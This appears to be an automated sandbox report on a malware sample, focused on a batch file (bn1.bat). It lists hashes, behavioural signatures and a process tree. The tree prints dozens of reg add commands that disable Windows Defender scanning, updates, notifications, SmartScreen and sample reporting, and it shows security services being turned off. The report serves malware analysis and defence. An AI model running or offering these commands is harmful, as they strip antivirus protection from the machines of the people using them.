Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 13:57
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240729-en
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20241023-en
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
General
-
Target
$_63_/bn1.bat
-
Size
6KB
-
MD5
18ed180c0b36d0e5bfee84806a19537c
-
SHA1
e7c9b67bdd5ae63666960db92bb98fdf43e7b875
-
SHA256
d388317f65ec52d46fc68548e60320758a6b512966c1d72314875dc29e459528
-
SHA512
cf6e82e48f9e7b11a4be4ebd606af59909d0a372fd694435e747279771c9d9fac8bfeaf9fedbc4c37dd0fc8e23e77c6b619ac084f230a207f9f96d0dc17b5f1b
-
SSDEEP
192:5qUEGA6oh/HbzBBzKF6gF8XM9LjZApFpQjTtf:AK
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" reg.exe -
Modifies Security services 2 TTPs 10 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20241204135709.cab makecab.exe -
pid Process 2584 powershell.exe 1560 powershell.exe 1272 powershell.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2580 PowerRun64.exe 2580 PowerRun64.exe 1744 PowerRun64.exe 1744 PowerRun64.exe 2524 PowerRun64.exe 2524 PowerRun64.exe 2840 PowerRun64.exe 2840 PowerRun64.exe 1656 PowerRun64.exe 1656 PowerRun64.exe 1944 PowerRun64.exe 1944 PowerRun64.exe 2104 PowerRun64.exe 2104 PowerRun64.exe 2080 PowerRun64.exe 2080 PowerRun64.exe 2368 PowerRun64.exe 2368 PowerRun64.exe 464 PowerRun64.exe 464 PowerRun64.exe 2472 PowerRun64.exe 2472 PowerRun64.exe 2044 PowerRun64.exe 2044 PowerRun64.exe 2464 PowerRun64.exe 2464 PowerRun64.exe 2468 PowerRun64.exe 2468 PowerRun64.exe 1604 PowerRun64.exe 1604 PowerRun64.exe 2544 PowerRun64.exe 2544 PowerRun64.exe 2796 PowerRun64.exe 2796 PowerRun64.exe 2560 PowerRun64.exe 2560 PowerRun64.exe 2684 PowerRun64.exe 2684 PowerRun64.exe 1972 PowerRun64.exe 1972 PowerRun64.exe 1692 PowerRun64.exe 1692 PowerRun64.exe 2136 PowerRun64.exe 1412 PowerRun64.exe 1412 PowerRun64.exe 2136 PowerRun64.exe 2104 PowerRun64.exe 2104 PowerRun64.exe 1784 PowerRun64.exe 1784 PowerRun64.exe 2204 PowerRun64.exe 2204 PowerRun64.exe 1920 PowerRun64.exe 1920 PowerRun64.exe 2124 PowerRun64.exe 2124 PowerRun64.exe 1980 PowerRun64.exe 1980 PowerRun64.exe 2408 PowerRun64.exe 2408 PowerRun64.exe 1508 PowerRun64.exe 1508 PowerRun64.exe 336 PowerRun64.exe 336 PowerRun64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2580 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2580 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2580 PowerRun64.exe Token: 0 2580 PowerRun64.exe Token: SeDebugPrivilege 1744 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1744 PowerRun64.exe Token: SeDebugPrivilege 2524 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1744 PowerRun64.exe Token: 0 1744 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2524 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2524 PowerRun64.exe Token: SeDebugPrivilege 2840 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2840 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2840 PowerRun64.exe Token: SeDebugPrivilege 1656 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1656 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1656 PowerRun64.exe Token: 0 1656 PowerRun64.exe Token: SeDebugPrivilege 1944 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1944 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1944 PowerRun64.exe Token: SeDebugPrivilege 2104 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2104 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2104 PowerRun64.exe Token: 0 2104 PowerRun64.exe Token: SeDebugPrivilege 2080 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2080 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2080 PowerRun64.exe Token: SeDebugPrivilege 2368 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2368 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2368 PowerRun64.exe Token: 0 2368 PowerRun64.exe Token: SeDebugPrivilege 464 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 464 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 464 PowerRun64.exe Token: SeDebugPrivilege 2472 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2472 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2472 PowerRun64.exe Token: 0 2472 PowerRun64.exe Token: SeDebugPrivilege 2044 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2044 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2044 PowerRun64.exe Token: SeDebugPrivilege 2464 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2464 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2464 PowerRun64.exe Token: 0 2464 PowerRun64.exe Token: SeDebugPrivilege 2468 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2468 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2468 PowerRun64.exe Token: SeDebugPrivilege 1604 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1604 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1604 PowerRun64.exe Token: 0 1604 PowerRun64.exe Token: SeDebugPrivilege 2544 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2544 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2544 PowerRun64.exe Token: SeDebugPrivilege 2796 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2796 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2796 PowerRun64.exe Token: 0 2796 PowerRun64.exe Token: SeDebugPrivilege 2560 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2560 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2560 PowerRun64.exe Token: SeDebugPrivilege 2684 PowerRun64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2616 2980 cmd.exe 31 PID 2980 wrote to memory of 2616 2980 cmd.exe 31 PID 2980 wrote to memory of 2616 2980 cmd.exe 31 PID 2980 wrote to memory of 2648 2980 cmd.exe 32 PID 2980 wrote to memory of 2648 2980 cmd.exe 32 PID 2980 wrote to memory of 2648 2980 cmd.exe 32 PID 2980 wrote to memory of 2364 2980 cmd.exe 33 PID 2980 wrote to memory of 2364 2980 cmd.exe 33 PID 2980 wrote to memory of 2364 2980 cmd.exe 33 PID 2980 wrote to memory of 2664 2980 cmd.exe 34 PID 2980 wrote to memory of 2664 2980 cmd.exe 34 PID 2980 wrote to memory of 2664 2980 cmd.exe 34 PID 2980 wrote to memory of 2704 2980 cmd.exe 35 PID 2980 wrote to memory of 2704 2980 cmd.exe 35 PID 2980 wrote to memory of 2704 2980 cmd.exe 35 PID 2980 wrote to memory of 2708 2980 cmd.exe 36 PID 2980 wrote to memory of 2708 2980 cmd.exe 36 PID 2980 wrote to memory of 2708 2980 cmd.exe 36 PID 2980 wrote to memory of 2728 2980 cmd.exe 37 PID 2980 wrote to memory of 2728 2980 cmd.exe 37 PID 2980 wrote to memory of 2728 2980 cmd.exe 37 PID 2980 wrote to memory of 2740 2980 cmd.exe 38 PID 2980 wrote to memory of 2740 2980 cmd.exe 38 PID 2980 wrote to memory of 2740 2980 cmd.exe 38 PID 2980 wrote to memory of 2896 2980 cmd.exe 39 PID 2980 wrote to memory of 2896 2980 cmd.exe 39 PID 2980 wrote to memory of 2896 2980 cmd.exe 39 PID 2980 wrote to memory of 2660 2980 cmd.exe 40 PID 2980 wrote to memory of 2660 2980 cmd.exe 40 PID 2980 wrote to memory of 2660 2980 cmd.exe 40 PID 2980 wrote to memory of 2636 2980 cmd.exe 41 PID 2980 wrote to memory of 2636 2980 cmd.exe 41 PID 2980 wrote to memory of 2636 2980 cmd.exe 41 PID 2980 wrote to memory of 2612 2980 cmd.exe 42 PID 2980 wrote to memory of 2612 2980 cmd.exe 42 PID 2980 wrote to memory of 2612 2980 cmd.exe 42 PID 2980 wrote to memory of 2640 2980 cmd.exe 43 PID 2980 wrote to memory of 2640 2980 cmd.exe 43 PID 2980 wrote to memory of 2640 2980 cmd.exe 43 PID 2980 wrote to memory of 2376 2980 cmd.exe 44 PID 2980 wrote to memory of 2376 2980 cmd.exe 44 PID 2980 wrote to memory of 2376 2980 cmd.exe 44 PID 2980 wrote to memory of 2884 2980 cmd.exe 45 PID 2980 wrote to memory of 2884 2980 cmd.exe 45 PID 2980 wrote to memory of 2884 2980 cmd.exe 45 PID 2980 wrote to memory of 2668 2980 cmd.exe 46 PID 2980 wrote to memory of 2668 2980 cmd.exe 46 PID 2980 wrote to memory of 2668 2980 cmd.exe 46 PID 2980 wrote to memory of 336 2980 cmd.exe 47 PID 2980 wrote to memory of 336 2980 cmd.exe 47 PID 2980 wrote to memory of 336 2980 cmd.exe 47 PID 2980 wrote to memory of 2780 2980 cmd.exe 48 PID 2980 wrote to memory of 2780 2980 cmd.exe 48 PID 2980 wrote to memory of 2780 2980 cmd.exe 48 PID 2980 wrote to memory of 2768 2980 cmd.exe 49 PID 2980 wrote to memory of 2768 2980 cmd.exe 49 PID 2980 wrote to memory of 2768 2980 cmd.exe 49 PID 2980 wrote to memory of 2796 2980 cmd.exe 50 PID 2980 wrote to memory of 2796 2980 cmd.exe 50 PID 2980 wrote to memory of 2796 2980 cmd.exe 50 PID 2980 wrote to memory of 2824 2980 cmd.exe 51 PID 2980 wrote to memory of 2824 2980 cmd.exe 51 PID 2980 wrote to memory of 2824 2980 cmd.exe 51 PID 2980 wrote to memory of 2724 2980 cmd.exe 52
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bn1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f2⤵PID:2616
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f2⤵PID:2648
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f2⤵PID:2364
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f2⤵PID:2664
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f2⤵PID:2704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f2⤵PID:2708
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f2⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f2⤵PID:2740
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f2⤵PID:2896
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f2⤵PID:2660
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f2⤵PID:2636
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f2⤵PID:2612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f2⤵PID:2640
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f2⤵PID:2376
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f2⤵PID:2884
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f2⤵PID:2668
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f2⤵PID:336
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f2⤵PID:2780
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f2⤵PID:2768
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f2⤵PID:2796
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f2⤵PID:2824
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f2⤵PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f2⤵PID:2748
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f2⤵PID:2776
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f2⤵PID:2736
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f2⤵PID:2620
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f2⤵PID:2760
-
-
